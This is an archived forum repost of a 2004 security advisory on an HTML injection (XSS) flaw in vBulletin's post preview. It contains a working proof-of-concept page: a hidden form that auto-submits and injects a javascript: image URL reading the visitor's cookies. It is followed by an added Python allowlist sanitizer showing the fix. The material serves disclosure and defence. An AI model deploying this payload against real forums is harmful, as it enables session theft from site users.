Full Version: Vbulletin Html Injection Vuln
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Jun 24 2004, 06:17 PM
Advisory Name : vBulletin HTML Injection Vulnerability
Release Date : June 24, 2004
Application : vBulletin
Tested On : 3.0.1 (others?)
Vendor : Jelsoft (http://www.vbulletin.com/)
Discoverer : Cheng Peng Su (apple_soup_at_msn.com)

Intro:
    From the vendor's website: vBulletin is a powerful, scalable and
fully customizable forums package for your web site. It has been written using
the Web's quickest-growing scripting language, PHP, and is complemented with a
highly efficient and ultra-fast back-end database engine built using MySQL.

Proof of concept:
    While a user is previewing a post, both newreply.php and newthread.php
sanitize the input in 'Preview', but not in the edit panel; malicious code can be
injected through this flaw.
 
Exploit:
    A page like the one below can lead a visitor to a Preview page which contains XSS code.
   
  -------------------------Remote.html-------------------------
  <!-- Hidden form that POSTs the payload to the forum's newreply.php as a
       "preview" request. The host and the t/p (thread/post) IDs are
       placeholders to be replaced with real values. -->
  <form action="http://host/newreply.php" name="vbform"
        method="post" style="visibility:hidden">
    <!-- the attribute value decodes to:
         <IMG src="javascript:alert(document.cookie)"> -->
    <input type="hidden" name="WYSIWYG_HTML"
           value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
    <input type="hidden" name="do" value="postreply"/>
    <input type="hidden" name="t" value="123456"/>
    <input type="hidden" name="p" value="123456"/>
    <!-- the submit button must be named "preview" so that its name is sent
         with the POST and vBulletin treats the request as a preview -->
    <input type="submit" class="button" name="preview"/>
  </form>
  <script>
    // click the preview button (rather than calling form.submit()) so the
    // "preview" field is included in the request
    document.vbform.preview.click();
  </script>
  -----------------------------End-----------------------------


Solution:
    The vBulletin team will release a patch or a fixed version as soon as possible.

Contact:
  Cheng Peng Su
  apple_soup_at_msn.com
  Class 1, Senior 2, High School attached to Wuhan University
  Wuhan, Hubei, China



Source: http://seclists.org/lists/bugtraq/2004/Jun/0395.html
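The advisory's point is that the same submitted HTML went through two code paths, only one of which was filtered. The following is an added example (not vBulletin code, and not from the advisory's author): a small allowlist HTML sanitizer that rejects javascript: and other non-http(s) URL schemes in src/href (including whitespace, case and entity-encoded variants), plus two sketch render functions whose names, structure and tag/attribute allowlist are assumptions made for illustration. The "vulnerable" variant mirrors the gap described above (preview box sanitized, editor panel echoing the raw input); the "fixed" variant runs every rendering of user HTML through the same filter.

```python
"""Allowlist HTML sanitizer and a sketch of the preview/edit-panel gap.

Added example, not vBulletin code. ALLOWED_TAGS/ALLOWED_ATTRS and the two
preview_page_* functions are assumptions made for illustration.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "p", "br", "img", "a"}          # assumed allowlist
ALLOWED_ATTRS = {"img": {"src", "alt"}, "a": {"href"}}         # assumed allowlist
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}   # drop these tags *and* their text
SAFE_SCHEMES = {"http", "https"}


def safe_url(value):
    """Accept only http(s) or relative URLs; reject javascript:, data:, vbscript:, ...

    Whitespace and control characters are removed before the scheme check
    because browsers ignore them ("java\\tscript:" still executes), and the
    comparison is case-insensitive ("JaVaScRiPt:").
    """
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    head = cleaned.split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
    if ":" not in head:
        return True  # no scheme at all -> relative URL
    return head.split(":", 1)[0].lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    """Rebuild the fragment keeping only allowlisted tags/attributes."""

    def __init__(self):
        # convert_charrefs=True means attribute values and text arrive decoded,
        # so "&#106;avascript:" is seen as "javascript:" by safe_url().
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0  # nesting depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped, its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onerror=, onload=, style=, ...
            value = value or ""
            if name in ("src", "href") and not safe_url(value):
                continue  # drop the attribute, keep the tag
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.skip:
                self.skip -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))


def sanitize_html(fragment):
    s = Sanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out)


# Constructed input: the payload carried in WYSIWYG_HTML by the advisory's form.
PAYLOAD = '<IMG src="javascript:alert(document.cookie)">'


def preview_page_vulnerable(wysiwyg_html):
    """Assumed model of the flaw: preview box filtered, editor panel not."""
    return {"preview": sanitize_html(wysiwyg_html), "editor": wysiwyg_html}


def preview_page_fixed(wysiwyg_html):
    """Every place the submitted HTML is rendered goes through the same filter."""
    clean = sanitize_html(wysiwyg_html)
    return {"preview": clean, "editor": clean}


if __name__ == "__main__":
    for name, fn in (("vulnerable", preview_page_vulnerable), ("fixed", preview_page_fixed)):
        print(name, fn(PAYLOAD))
```

The sanitizer drops an unsafe attribute rather than the whole tag so that the user's markup degrades gracefully, and it re-escapes all text on output, so the result is safe to embed regardless of how the input was encoded. The same `sanitize_html` call must sit in front of every sink that renders the submission, which is exactly what the edit panel in the advisory was missing.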